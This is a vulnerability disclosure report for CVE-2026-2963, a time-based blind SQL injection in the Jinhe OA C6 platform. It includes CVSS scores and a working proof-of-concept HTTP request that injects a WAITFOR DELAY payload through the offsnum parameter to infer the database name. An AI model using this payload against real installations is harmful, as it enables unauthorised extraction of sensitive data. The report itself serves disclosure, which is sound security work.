vuln-report
Information
Vendor of the products: Jinher (Beijing Jinhe Network Technology Co., Ltd.)
Vendor’s website: Jinher-金和网络
Affected products: Jinhe OA (Kingsoft C6 Collaborative Management Platform)
Affected firmware version: C6
Report: smitug01
CVE ID: CVE-2026-2963
VulDB ID: VDB-347330 · GCVE-100-347330
CVSS
| Version | Score | Vector |
|---|---|---|
| CVSSv3 Base Score | 6.3 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| CVSSv3 Temp Score | 5.7 (23 Feb, 2026) | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C |
| CVSSv2 Base Score | 6.5 | CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P |
| CVSSv2 Temp Score | 5.1 (23 Feb, 2026) | CVSS2#E:POC/RL:OF/RC:C |
Overview
Beijing Jinhe Network Technology Co., Ltd. (http://www.jinher.com/) is a company specializing in collaborative management software (OA) and information technology solutions. The company is committed to providing efficient and secure digital office platforms for government agencies and enterprises.
Jinhe OA has a front-end SQL injection vulnerability, which attackers can exploit to obtain sensitive data.
Vulnerability details
Vulnerability Location: /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx
The OfficeSupplyTypeRight.aspx endpoint accepts user-controllable parameters (id and offsnum) without proper sanitization, leading to a time-based blind SQL injection vulnerability.
POC
The current database name can be determined by the delay.
GET /C6/Jhsoft.Web.officesupply/OfficeSupplyTypeRight.aspx/?id=1&offsnum=1';+IF+(SELECT+DB_NAME())+=+'C6'+WAITFOR+DELAY+'0:0:6'--%20q HTTP/1.1
Host: *.*.*.*:8088
Accept-Language: zh-TW,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
The response was delayed by approximately 6 seconds (6,816 millis), confirming the SQL injection vulnerability and that the current database name is C6.
